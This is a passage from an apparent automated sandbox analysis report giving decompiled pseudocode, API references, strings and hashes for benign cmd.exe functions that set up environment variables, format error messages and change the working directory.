ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000001,?,00000000), ref: 001BD2A3
SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,FFFFFFFF,00000002), ref: 001CB5B4
SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,000000FF,FFFFFFFF,00000002), ref: 001CB5CF

Strings

con, xrefs: 001BD1E4

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: File$Pointer$Create$ReadSize_open_osfhandle_wcsicmp
String ID: con
API String ID: 686027947-4257191772
Opcode ID: 7550c57889374062515597c2b9bcef968972cabe367d494bdf975b46deec68bf
Instruction ID: 55235ebcf15895325a5b1c0ee721152f75b3392ec2b5d6fef02c448c727f8fe7
Opcode Fuzzy Hash: 7550c57889374062515597c2b9bcef968972cabe367d494bdf975b46deec68bf
Instruction Fuzzy Hash: 0151E770A04205ABDB14DB68EC89FFE77B8EB45720F100219F925E72D0EB74C945CB61

Uniqueness

Uniqueness Score: -1.00%

Function 001BCEA9 Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 167
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E001BCEA9() {
				signed int _v8;
				long _v12;
				char _v16;
				int _v20;
				void _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t30;
				WCHAR* _t41;
				struct HINSTANCE__* _t50;
				struct HINSTANCE__* _t52;
				void* _t53;
				int _t55;
				void* _t56;
				struct HINSTANCE__* _t78;
				signed int _t79;
				struct HINSTANCE__* _t81;
				void* _t85;
				int* _t88;
				void* _t89;
				struct HINSTANCE__* _t91;
				struct HINSTANCE__* _t96;
				signed int _t98;

				_t30 =  *0x1dd0b4; // 0xea614d48
				_v8 = _t30 ^ _t98;
				_t91 = 0;
				_v12 = 0x104;
				_v20 = 0;
				_v16 = 1;
				memset( &_v540, 0, 0x104);
				if(E001C0C70( &_v540, ((0 | _v16 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					do {
						__eflags = E001C4B60(__eflags, 0);
					} while (__eflags == 0);
					exit(1);
					L13:
					_t41 =  &_v540;
					L2:
					GetModuleFileNameW(_t91, _t41, _v12);
					if(E001BCFBC(L"PATH") == 0) {
						E001C3A50(L"PATH", 0x1b24ac);
					}
					if(E001BCFBC(L"PATHEXT") == 0) {
						E001C3A50(L"PATHEXT", L".COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC");
					}
					_t95 = L"PROMPT";
					if(E001BCFBC(L"PROMPT") == 0) {
						E001C3A50(L"PROMPT", L"$P$G");
					}
					if(E001BCFBC(L"COMSPEC") == 0) {
						_t68 = _v20;
						__eflags = _v20;
						if(_v20 == 0) {
							_t68 =  &_v540;
						}
						_t85 = 0x2e;
						_t50 = E001BD7D4(_t68, _t85);
						__eflags = _t50;
						if(_t50 != 0) {
							L33:
							_t86 = _v20;
							__eflags = _v20;
							if(_v20 == 0) {
								_t86 =  &_v540;
							}
							E001C3A50(L"COMSPEC", _t86);
							goto L6;
						} else {
							__imp___wcsupr(L"CMD.EXE");
							_t78 = _v20;
							_t96 = _t78;
							__eflags = _t78;
							if(_t78 == 0) {
								_t96 =  &_v540;
							}
							_t88 =  &(_t96->i);
							do {
								_t55 = _t96->i;
								_t96 =  &(_t96->i);
								__eflags = _t55 - _t91;
							} while (_t55 != _t91);
							_t91 = _t78;
							_t95 = _t96 - _t88 >> 1;
							__eflags = _t78;
							if(_t78 == 0) {
								_t91 =  &_v540;
								_t78 = _t91;
							}
							_t89 = 0x5c;
							_t56 = E001C2349(_t78, _t89);
							_t79 = _t95 - 1;
							__eflags = _t91 + _t79 * 2 - _t56;
							_t81 = _v20;
							if(_t91 + _t79 * 2 == _t56) {
								__eflags = _t81;
								if(_t81 == 0) {
									_t81 =  &_v540;
								}
								_push(L"CMD.EXE");
							} else {
								__eflags = _t81;
								if(_t81 == 0) {
									_t81 =  &_v540;
								}
								_push(L"\\CMD.EXE");
							}
							E001C18C0(_t81, _v12);
							goto L33;
						}
					} else {
						L6:
						_t52 = E001BCFBC(L"KEYS");
						if(_t52 != 0) {
							__imp___wcsicmp(_t52, L"ON");
							__eflags = _t52;
							if(__eflags == 0) {
								 *0x1f852c = 1;
							}
						}
						_t73 =  *0x1f3cb8;
						_t109 =  *0x1f3cb8;
						if( *0x1f3cb8 == 0) {
							_t73 = 0x1f3ab0;
						}
						_t53 = E001C33FC(1, _t73, 1, _t91, _t95, _t109);
						__imp__??_V@YAXPAX@Z();
						return E001C6FD0(_t53, 1, _v8 ^ _t98, 1, _t91, _t95, _v20);
					}
				}
				_t41 = _v20;
				if(_t41 == 0) {
					goto L13;
				}
				goto L2;
			}

0x001bceb4
0x001bcebb
0x001bcecc
0x001bcece
0x001bced4
0x001bceda
0x001bcedd
0x001bcf03
0x001cb419
0x001cb41f
0x001cb41f
0x001cb424
0x001cb42a
0x001cb42a
0x001bcf14
0x001bcf19
0x001bcf2d
0x001cb43c
0x001cb43c
0x001bcf41
0x001cb44d
0x001cb44d
0x001bcf47
0x001bcf55
0x001bcfae
0x001bcfae
0x001bcf63
0x001cb457
0x001cb45a
0x001cb45c
0x001cb45e
0x001cb45e
0x001cb466
0x001cb467
0x001cb46c
0x001cb46e
0x001cb4e8
0x001cb4e8
0x001cb4eb
0x001cb4ed
0x001cb4ef
0x001cb4ef
0x001cb4fa
0x00000000
0x001cb470
0x001cb475
0x001cb47c
0x001cb47f
0x001cb481
0x001cb483
0x001cb485
0x001cb485
0x001cb48b
0x001cb48e
0x001cb48e
0x001cb491
0x001cb494
0x001cb494
0x001cb49b
0x001cb49d
0x001cb49f
0x001cb4a1
0x001cb4a3
0x001cb4a9
0x001cb4a9
0x001cb4ad
0x001cb4ae
0x001cb4b3
0x001cb4b9
0x001cb4bb
0x001cb4be
0x001cb4d1
0x001cb4d3
0x001cb4d5
0x001cb4d5
0x001cb4db
0x001cb4c0
0x001cb4c0
0x001cb4c2
0x001cb4c4
0x001cb4c4
0x001cb4ca
0x001cb4ca
0x001cb4e3
0x00000000
0x001cb4e3
0x001bcf69
0x001bcf69
0x001bcf6e
0x001bcf75
0x001cb50a
0x001cb512
0x001cb514
0x001cb51a
0x001cb51a
0x001cb514
0x001bcf7b
0x001bcf81
0x001bcf83
0x001bcfb5
0x001bcfb5
0x001bcf87
0x001bcf8f
0x001bcfa6
0x001bcfa6
0x001bcf63
0x001bcf09
0x001bcf0e
0x00000000
0x00000000
0x00000000

APIs

memset.MSVCRT ref: 001BCEDD

Part of subcall function 001C0C70: ??_V@YAXPAX@Z.MSVCRT ref: 001C0CBA
Part of subcall function 001C0C70: memset.MSVCRT ref: 001C0CDD

GetModuleFileNameW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,?,?,-00000001), ref: 001BCF19

Part of subcall function 001BCFBC: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,001DF830,00002000,?,?,?,?,?,001C373A,001B590A,00000000), ref: 001BCFDF

Part of subcall function 001BCFBC: _wcsicmp.MSVCRT ref: 001BD005
Part of subcall function 001BCFBC: _wcsicmp.MSVCRT ref: 001BD01B
Part of subcall function 001BCFBC: _wcsicmp.MSVCRT ref: 001BD031
Part of subcall function 001BCFBC: _wcsicmp.MSVCRT ref: 001BD047
Part of subcall function 001BCFBC: _wcsicmp.MSVCRT ref: 001BD05D
Part of subcall function 001BCFBC: _wcsicmp.MSVCRT ref: 001BD073
Part of subcall function 001BCFBC: _wcsicmp.MSVCRT ref: 001BD085
Part of subcall function 001BCFBC: _wcsicmp.MSVCRT ref: 001BD09B

??_V@YAXPAX@Z.MSVCRT ref: 001BCF8F
exit.MSVCRT ref: 001CB424
_wcsupr.MSVCRT ref: 001CB475

Strings

$P$G, xrefs: 001BCFA7
.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC, xrefs: 001CB446
COMSPEC, xrefs: 001BCF57, 001CB4F5
PATHEXT, xrefs: 001BCF33
PATH, xrefs: 001BCF1F
PROMPT, xrefs: 001BCF47
KEYS, xrefs: 001BCF69
\CMD.EXE, xrefs: 001CB4CA

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: _wcsicmp$memset$EnvironmentFileModuleNameVariable_wcsuprexit
String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
API String ID: 2336066422-4197029667
Opcode ID: 8a70c817ca2f7550519a5d17a2a3e0dfa778cc88f7492e6dc13e2dd3c29bc00f
Instruction ID: 16ed75547bdf9d118f85000b096d917bf3f6787f5e6aaa116bf8d31e23fb6522
Opcode Fuzzy Hash: 8a70c817ca2f7550519a5d17a2a3e0dfa778cc88f7492e6dc13e2dd3c29bc00f
Instruction Fuzzy Hash: 7451C131A0821997DF18EB618896FFEB365ABB4304F4141ADE817E3192DF34DE45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 001D1C79 Relevance: 24.7, APIs: 2, Strings: 12, Instructions: 166
windowthreadCOMMON

Download Yara Rule

C-Code - Quality: 23%

			E001D1C79(signed short* __ecx, signed int __edx, intOrPtr* _a4) {
				signed int _v8;
				short _v520;
				char* _v524;
				signed int _v528;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t39;
				intOrPtr _t45;
				signed short* _t50;
				void* _t53;
				void* _t54;
				signed short* _t58;
				void* _t59;
				void* _t60;
				signed short* _t65;
				void* _t74;
				intOrPtr* _t75;
				void* _t76;
				intOrPtr* _t77;
				signed int _t78;
				void* _t79;
				void* _t80;
				void* _t81;
				void* _t82;

				_t73 = __edx;
				_t39 =  *0x1dd0b4; // 0xea614d48
				_v8 = _t39 ^ _t78;
				_t65 = __ecx;
				_v528 = __edx;
				_t77 = _a4;
				if(__edx == 0 || __ecx == 0) {
					L31:
					return E001C6FD0(0, _t65, _v8 ^ _t78, _t73, _t74, _t77);
				} else {
					_push(_t74);
					_t75 =  *0x1f807c;
					 *__ecx = 0;
					if(_t75 == 0 ||  *0x1f8081 == 0) {
						L5:
						_v524 = 0x1b30d8;
						_t45 =  *_t77;
						if(_t45 == 0) {
							_v524 = "Exception";
						} else {
							_t59 = _t45 - 1;
							if(_t59 == 0) {
								_v524 = "ReturnHr";
							} else {
								_t60 = _t59 - 1;
								if(_t60 == 0) {
									_v524 = "LogHr";
								} else {
									if(_t60 == 1) {
										_v524 = "FailFast";
									}
								}
							}
						}
						_v520 = 0;
						FormatMessageW(0x1200, 0,  *(_t77 + 4), 0x400,  &_v520, 0x100, 0);
						_push( *((intOrPtr*)(_t77 + 0x48)));
						_push( *((intOrPtr*)(_t77 + 0x44)));
						_t76 = _t65 + _v528 * 2;
						if( *((intOrPtr*)(_t77 + 0x1c)) == 0) {
							_push(L"%hs!%p: ");
							_push(_t76);
							_push(_t65);
							_t50 = E001D24CB();
							_t80 = _t79 + 0x14;
						} else {
							_push( *((intOrPtr*)(_t77 + 0x20)));
							_t50 = E001D24CB(_t65, _t76, L"%hs(%d)\\%hs!%p: ",  *((intOrPtr*)(_t77 + 0x1c)));
							_t80 = _t79 + 0x1c;
						}
						_t65 = _t50;
						if( *((intOrPtr*)(_t77 + 0x4c)) != 0) {
							_t58 = E001D24CB(_t65, _t76, L"(caller: %p) ",  *((intOrPtr*)(_t77 + 0x4c)));
							_t80 = _t80 + 0x10;
							_t65 = _t58;
						}
						_push( &_v520);
						_push( *(_t77 + 4));
						_push(GetCurrentThreadId());
						_push( *((intOrPtr*)(_t77 + 0x24)));
						_t53 = E001D24CB(_t65, _t76, L"%hs(%d) tid(%x) %08X %ws", _v524);
						_t81 = _t80 + 0x20;
						if( *((intOrPtr*)(_t77 + 0xc)) != 0 ||  *((intOrPtr*)(_t77 + 0x28)) != 0 ||  *((intOrPtr*)(_t77 + 0x18)) != 0) {
							_push(L"    ");
							_push(_t76);
							_push(_t53);
							_t54 = E001D24CB();
							_t82 = _t81 + 0xc;
							if( *((intOrPtr*)(_t77 + 0xc)) != 0) {
								_t54 = E001D24CB(_t54, _t76, L"Msg:[%ws] ",  *((intOrPtr*)(_t77 + 0xc)));
								_t82 = _t82 + 0x10;
							}
							if( *((intOrPtr*)(_t77 + 0x28)) != 0) {
								_t54 = E001D24CB(_t54, _t76, L"CallContext:[%hs] ",  *((intOrPtr*)(_t77 + 0x28)));
								_t82 = _t82 + 0x10;
							}
							if( *((intOrPtr*)(_t77 + 0x14)) == 0) {
								if( *((intOrPtr*)(_t77 + 0x18)) == 0) {
									_push("\n");
									_push(_t76);
									_push(_t54);
									E001D24CB();
								} else {
									E001D24CB(_t54, _t76, L"[%hs]\n",  *((intOrPtr*)(_t77 + 0x18)));
								}
							} else {
								_push( *((intOrPtr*)(_t77 + 0x14)));
								E001D24CB(_t54, _t76, L"[%hs(%hs)]\n",  *((intOrPtr*)(_t77 + 0x18)));
							}
						}
						goto L30;
					} else {
						 *0x1f94b4(_t77, __ecx, __edx);
						 *_t75();
						if(( *__ecx & 0x0000ffff) != 0) {
							L30:
							_pop(_t74);
							goto L31;
						}
						goto L5;
					}
				}
			}

0x001d1c79
0x001d1c84
0x001d1c8b
0x001d1c91
0x001d1c93
0x001d1c9a
0x001d1c9f
0x001d1e72
0x001d1e83
0x001d1cad
0x001d1cad
0x001d1cae
0x001d1cb6
0x001d1cbb
0x001d1cde
0x001d1ce2
0x001d1cec
0x001d1cee
0x001d1d23
0x001d1cf0
0x001d1cf0
0x001d1cf3
0x001d1d17
0x001d1cf5
0x001d1cf5
0x001d1cf8
0x001d1d0b
0x001d1cfa
0x001d1cfd
0x001d1cff
0x001d1cff
0x001d1cfd
0x001d1cf8
0x001d1cf3
0x001d1d35
0x001d1d51
0x001d1d61
0x001d1d64
0x001d1d67
0x001d1d6a
0x001d1d83
0x001d1d88
0x001d1d89
0x001d1d8a
0x001d1d8f
0x001d1d6c
0x001d1d6c
0x001d1d79
0x001d1d7e
0x001d1d7e
0x001d1d96
0x001d1d98
0x001d1da4
0x001d1da9
0x001d1dac
0x001d1dac
0x001d1db4
0x001d1db5
0x001d1dbe
0x001d1dbf
0x001d1dcf
0x001d1dd6
0x001d1ddc
0x001d1dec
0x001d1df1
0x001d1df2
0x001d1df3
0x001d1df8
0x001d1dff
0x001d1e0b
0x001d1e10
0x001d1e10
0x001d1e17
0x001d1e23
0x001d1e28
0x001d1e28
0x001d1e2f
0x001d1e4c
0x001d1e62
0x001d1e67
0x001d1e68
0x001d1e69
0x001d1e4e
0x001d1e58
0x001d1e5d
0x001d1e31
0x001d1e31
0x001d1e3e
0x001d1e43
0x001d1e2f
0x00000000
0x001d1cc5
0x001d1cca
0x001d1cd0
0x001d1cd8
0x001d1e71
0x001d1e71
0x00000000
0x001d1e71
0x00000000
0x001d1cd8
0x001d1cbb

APIs

FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001200,00000000,?,00000400,?,00000100,00000000,?,?,00000000), ref: 001D1D51
GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?), ref: 001D1DB8

Strings

FailFast, xrefs: 001D1CFF
Msg:[%ws] , xrefs: 001D1E04
CallContext:[%hs] , xrefs: 001D1E1C
%hs(%d)\%hs!%p: , xrefs: 001D1D72
[%hs(%hs)], xrefs: 001D1E37
[%hs], xrefs: 001D1E51
LogHr, xrefs: 001D1D0B
%hs(%d) tid(%x) %08X %ws, xrefs: 001D1DC8
, xrefs: 001D1DEC
Exception, xrefs: 001D1D23
(caller: %p) , xrefs: 001D1D9D
%hs!%p: , xrefs: 001D1D83

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: CurrentFormatMessageThread
String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%d)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $[%hs(%hs)]$[%hs]
API String ID: 2411632146-3118963822
Opcode ID: 5dd0e93ce35da51f545690908f4ade00d492b1707b424db6bc5b9e385d21c6f0
Instruction ID: 569cbb0460aa8d97f429a45b9afaef776fb800e6f9b271b080f27d202e624700
Opcode Fuzzy Hash: 5dd0e93ce35da51f545690908f4ade00d492b1707b424db6bc5b9e385d21c6f0
Instruction Fuzzy Hash: 965114B1500700BBDB31AF699C49EB7B7BDEF64300F00055EF96992361DB719AA0CB61

Uniqueness

Uniqueness Score: -1.00%

Function 001C33FC Relevance: 24.3, APIs: 16, Instructions: 307
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E001C33FC(short __ebx, WCHAR* __ecx, WCHAR* __edx, WCHAR* __edi, void* __esi, void* __eflags) {
				void* _t75;
				short _t86;
				WCHAR* _t87;
				WCHAR* _t88;
				signed short* _t90;
				short _t93;
				int _t94;
				WCHAR* _t96;
				WCHAR* _t105;
				short _t109;
				WCHAR* _t113;
				WCHAR* _t115;
				WCHAR* _t125;
				signed int _t126;
				void* _t131;
				WCHAR* _t142;
				WCHAR* _t145;
				WCHAR* _t153;
				short* _t164;
				WCHAR* _t166;
				signed int _t168;
				WCHAR* _t169;
				short* _t176;
				void* _t177;

				_t173 = __edi;
				_t135 = __ebx;
				_push(0x240);
				_push(0x1dbdd8);
				E001C75CC(__ebx, __edi, __esi);
				 *(_t177 - 0x24c) = __edx;
				_t175 = __ecx;
				_t75 = 0x5c;
				if( *((intOrPtr*)(__ecx)) == _t75) {
					if( *((intOrPtr*)(__ecx + 2)) != _t75) {
						goto L1;
					} else {
					}
				} else {
					L1:
					E001C0D51(_t177 - 0x244);
					if(E001C0C70(_t177 - 0x244, ((0 |  *((intOrPtr*)(_t177 - 0x38)) == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
						L52:
						E001C0DE8(_t82, _t177 - 0x244);
						goto L54;
					} else {
						_t173 = E001BDF40(_t175);
						 *(_t177 - 0x250) = _t173;
						if(_t173 == 0) {
							goto L52;
						} else {
							 *((intOrPtr*)(_t177 - 4)) = 0;
							_t142 = _t173;
							_t9 =  &(_t142[1]); // 0x2
							_t164 = _t9;
							do {
								_t86 =  *_t142;
								_t142 =  &(_t142[1]);
							} while (_t86 != 0);
							_t87 =  &(_t173[_t142 - _t164 >> 1]);
							_t145 = _t87;
							while(1) {
								 *(_t177 - 0x248) = _t87;
								if(_t145 <= _t173) {
									break;
								}
								_t13 = _t87 - 2; // -4
								_t145 = _t13;
								if( *_t145 == 0x20) {
									_t87 = _t145;
									continue;
								}
								break;
							}
							 *_t87 = 0;
							_t88 =  *(_t177 - 0x3c);
							if(_t88 == 0) {
								_t88 = _t177 - 0x244;
							}
							GetCurrentDirectoryW( *(_t177 - 0x34), _t88);
							_t90 =  *(_t177 - 0x3c);
							if(_t90 == 0) {
								_t90 = _t177 - 0x244;
							}
							_t135 = towupper( *_t90 & 0x0000ffff);
							_t93 = 0x3d;
							 *((short*)(_t177 - 0x28)) = _t93;
							_t94 = iswalpha( *_t173 & 0x0000ffff);
							_t175 = 0x3a;
							if(_t94 == 0 || _t173[1] != _t175) {
								 *((short*)(_t177 - 0x26)) = _t135;
							} else {
								 *((short*)(_t177 - 0x26)) = towupper( *_t173 & 0x0000ffff);
							}
							 *(_t177 - 0x24) = _t175;
							 *((short*)(_t177 - 0x22)) = 0;
							_t96 =  *(_t177 - 0x3c);
							if(_t96 == 0) {
								_t96 = _t177 - 0x244;
							}
							_t97 = GetFullPathNameW(_t173,  *(_t177 - 0x34), _t96, _t177 - 0x248);
							if(_t97 == 0) {
								L62:
								_t175 = GetLastError();
								goto L64;
							} else {
								if(_t97 >  *(_t177 - 0x34)) {
									L65:
									E001C0DE8(_t97, _t177 - 0x244);
									_push(0xfffffffe);
									_push(_t177 - 0x10);
									_push(0x1dd0b4);
									L001C82BB();
								} else {
									_t153 =  *(_t177 - 0x3c);
									_t105 = _t153;
									if(_t153 == 0) {
										_t105 = _t177 - 0x244;
									}
									if( *_t105 == 0) {
										L55:
										E001C0DE8(_t105, _t177 - 0x244);
										_push(0xfffffffe);
										_push(_t177 - 0x10);
										_push(0x1dd0b4);
										L001C82BB();
										_push(3);
										goto L56;
									} else {
										if(_t153 == 0) {
											_t105 = _t177 - 0x244;
										}
										if(_t105[1] != _t175) {
											goto L55;
										} else {
											_t166 = _t153;
											if(_t153 == 0) {
												_t166 = _t177 - 0x244;
											}
											_t176 =  &(_t166[1]);
											do {
												_t109 =  *_t166;
												_t166 =  &(_t166[1]);
											} while (_t109 !=  *((intOrPtr*)(_t177 - 4)));
											_t168 = _t166 - _t176 >> 1;
											if(_t153 == 0) {
												_t153 = _t177 - 0x244;
											}
											_t169 =  &(_t153[_t168]);
											while(1) {
												_t175 = _t169;
												 *(_t177 - 0x248) = _t169;
												if(_t175 <= E001C6CF0(_t177 - 0x244) + 6) {
													break;
												}
												_t131 = 0x5c;
												if( *((intOrPtr*)(_t169 - 2)) == _t131) {
													_t169 = _t175 - 2;
													continue;
												}
												break;
											}
											 *_t169 = 0;
											_t113 =  *(_t177 - 0x3c);
											if(_t113 == 0) {
												_t113 = _t177 - 0x244;
											}
											if(GetFileAttributesW(_t113) == 0xffffffff) {
												_t175 = GetLastError();
												if(_t175 == 2 || _t175 == 3) {
													goto L29;
												} else {
													if(_t175 != 0x7b) {
														goto L64;
													} else {
														goto L29;
													}
												}
											} else {
												L29:
												if( *0x1f3cc9 == 0) {
													L32:
													_t175 =  *(_t177 - 0x24c);
													if(_t175 == 2) {
														L36:
														if(_t175 == 0 || _t175 == 1 && _t135 ==  *((intOrPtr*)(_t177 - 0x26))) {
															_t115 =  *(_t177 - 0x3c);
															if(_t115 == 0) {
																_t115 = _t177 - 0x244;
															}
															if(SetCurrentDirectoryW(_t115) == 0) {
																goto L62;
															} else {
																goto L41;
															}
														} else {
															L41:
															_t170 =  *(_t177 - 0x3c);
															if( *(_t177 - 0x3c) == 0) {
																_t170 = _t177 - 0x244;
															}
															if(E001C3A50(_t177 - 0x28, _t170) != 0) {
																E001C0DE8(_t117, _t177 - 0x244);
																_push(0xfffffffe);
																_push(_t177 - 0x10);
																_push(0x1dd0b4);
																L001C82BB();
																L54:
																_push(8);
																L56:
															} else {
																_t158 =  *0x1f3cb8;
																if( *0x1f3cb8 == 0) {
																	_t158 = 0x1f3ab0;
																}
																E001C36CB(_t135, _t158,  *0x1f3cc0, 0);
																 *((intOrPtr*)(_t177 - 4)) = 0xfffffffe;
																E001C0DE8(E001C36AC(_t173), _t177 - 0x244);
															}
														}
													} else {
														_t125 =  *(_t177 - 0x3c);
														if(_t125 == 0) {
															_t125 = _t177 - 0x244;
														}
														_t126 = GetFileAttributesW(_t125);
														if(_t126 == 0xffffffff) {
															_t98 = GetLastError();
															_t175 = _t98;
															if(_t98 == 2) {
																_t175 = 3;
															}
															L64:
															E001C0DE8(_t98, _t177 - 0x244);
															_push(0xfffffffe);
															_push(_t177 - 0x10);
															_push(0x1dd0b4);
															L001C82BB();
														} else {
															if((_t126 & 0x00000410) == 0) {
																E001C0DE8(_t126, _t177 - 0x244);
																_push(0xfffffffe);
																_push(_t177 - 0x10);
																_push(0x1dd0b4);
																L001C82BB();
															} else {
																goto L36;
															}
														}
													}
												} else {
													_t161 =  *(_t177 - 0x3c);
													if( *(_t177 - 0x3c) == 0) {
														_t161 = _t177 - 0x244;
													}
													if(E001C245C(_t161,  *(_t177 - 0x34), 0) == 0) {
														goto L65;
													} else {
														goto L32;
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				return E001C7614(_t135, _t173, _t175);
			}

0x001c33fc
0x001c33fc
0x001c33fc
0x001c3401
0x001c3406
0x001c340b
0x001c3411
0x001c3415
0x001c3419
0x001cdc11
0x00000000
0x001cdc17
0x001cdc17
0x001c341f
0x001c341f
0x001c3425
0x001c344b
0x001cdc21
0x001cdc27
0x00000000
0x001c3451
0x001c3458
0x001c345a
0x001c3462
0x00000000
0x001c3468
0x001c346a
0x001c346d
0x001c346f
0x001c346f
0x001c3472
0x001c3472
0x001c3475
0x001c3478
0x001c3481
0x001c3484
0x001c3486
0x001c3486
0x001c348e
0x00000000
0x00000000
0x001c3490
0x001c3490
0x001c3497
0x001cdc76
0x00000000
0x001cdc76
0x00000000
0x001c3497
0x001c349f
0x001c34a2
0x001c34a7
0x001cdc7d
0x001cdc7d
0x001c34b1
0x001c34b7
0x001c34bc
0x001cdc88
0x001cdc88
0x001c34cd
0x001c34d2
0x001c34d3
0x001c34db
0x001c34e4
0x001c34e7
0x001cdc93
0x001c34f7
0x001c3502
0x001c3502
0x001c3506
0x001c350c
0x001c3510
0x001c3515
0x001cdc9c
0x001cdc9c
0x001c3527
0x001c352f
0x001cdca7
0x001cdcad
0x00000000
0x001c3535
0x001c3538
0x001cdcd9
0x001cdcdf
0x001cdce4
0x001cdce9
0x001cdcea
0x001cdcef
0x001c353e
0x001c353e
0x001c3543
0x001c3545
0x001cdd01
0x001cdd01
0x001c3550
0x001cdc50
0x001cdc56
0x001cdc5b
0x001cdc60
0x001cdc61
0x001cdc66
0x001cdc6e
0x00000000
0x001c3556
0x001c355a
0x001cdd0c
0x001cdd0c
0x001c3564
0x00000000
0x001c356a
0x001c356c
0x001c356e
0x001cdd17
0x001cdd17
0x001c3574
0x001c3577
0x001c3577
0x001c357a
0x001c357d
0x001c3585
0x001c3589
0x001cdd22
0x001cdd22
0x001c358f
0x001c3592
0x001c3592
0x001c3594
0x001c35aa
0x00000000
0x00000000
0x001c35ae
0x001c35b3
0x001c36a4
0x00000000
0x001c36a4
0x00000000
0x001c35b3
0x001c35bb
0x001c35be
0x001c35c3
0x001cdd2d
0x001cdd2d
0x001c35d3
0x001cdd3e
0x001cdd43
0x00000000
0x001cdd52
0x001cdd55
0x00000000
0x001cdd5b
0x00000000
0x001cdd5b
0x001cdd55
0x001c35d9
0x001c35d9
0x001c35e0
0x001c3600
0x001c3600
0x001c3609
0x001c3631
0x001c3633
0x001c3640
0x001c3645
0x001c36b4
0x001c36b4
0x001c3650
0x00000000
0x00000000
0x00000000
0x00000000
0x001c3656
0x001c3656
0x001c3656
0x001c365b
0x001c36bc
0x001c36bc
0x001c3667
0x001cdc34
0x001cdc39
0x001cdc3e
0x001cdc3f
0x001cdc44
0x001cdc4c
0x001cdc4c
0x001cdc70
0x001c366d
0x001c366d
0x001c3675
0x001c36c4
0x001c36c4
0x001c3680
0x001c3685
0x001c3697
0x001c369c
0x001c3667
0x001c360b
0x001c360b
0x001c3610
0x001cdd6b
0x001cdd6b
0x001c3617
0x001c3620
0x001cdd76
0x001cdd7c
0x001cdd81
0x001cdcb3
0x001cdcb3
0x001cdcb4
0x001cdcba
0x001cdcbf
0x001cdcc4
0x001cdcc5
0x001cdcca
0x001c3626
0x001c362b
0x001cdd92
0x001cdd97
0x001cdd9c
0x001cdd9d
0x001cdda2
0x00000000
0x00000000
0x00000000
0x001c362b
0x001c3620
0x001c35e2
0x001c35e2
0x001c35e7
0x001cdd60
0x001cdd60
0x001c35fa
0x00000000
0x00000000
0x00000000
0x00000000
0x001c35fa
0x001c35e0
0x001c35d3
0x001c3564
0x001c3550
0x001c3538
0x001c352f
0x001c3462
0x001c344b
0x001c36a3

APIs

Part of subcall function 001C0D51: memset.MSVCRT ref: 001C0D7D

Part of subcall function 001C0C70: ??_V@YAXPAX@Z.MSVCRT ref: 001C0CBA
Part of subcall function 001C0C70: memset.MSVCRT ref: 001C0CDD

GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,-00000105,001DBDD8,00000240,001C4B82,00000000,00000000,001CAE6E,00000000,?,?,?,?,?), ref: 001C34B1
towupper.MSVCRT ref: 001C34C6
iswalpha.MSVCRT ref: 001C34DB
towupper.MSVCRT ref: 001C34FB
GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?), ref: 001C3527
GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 001C35CA
GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 001C3617
SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?), ref: 001C3648
_local_unwind4.MSVCRT ref: 001CDC44
_local_unwind4.MSVCRT ref: 001CDC66

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
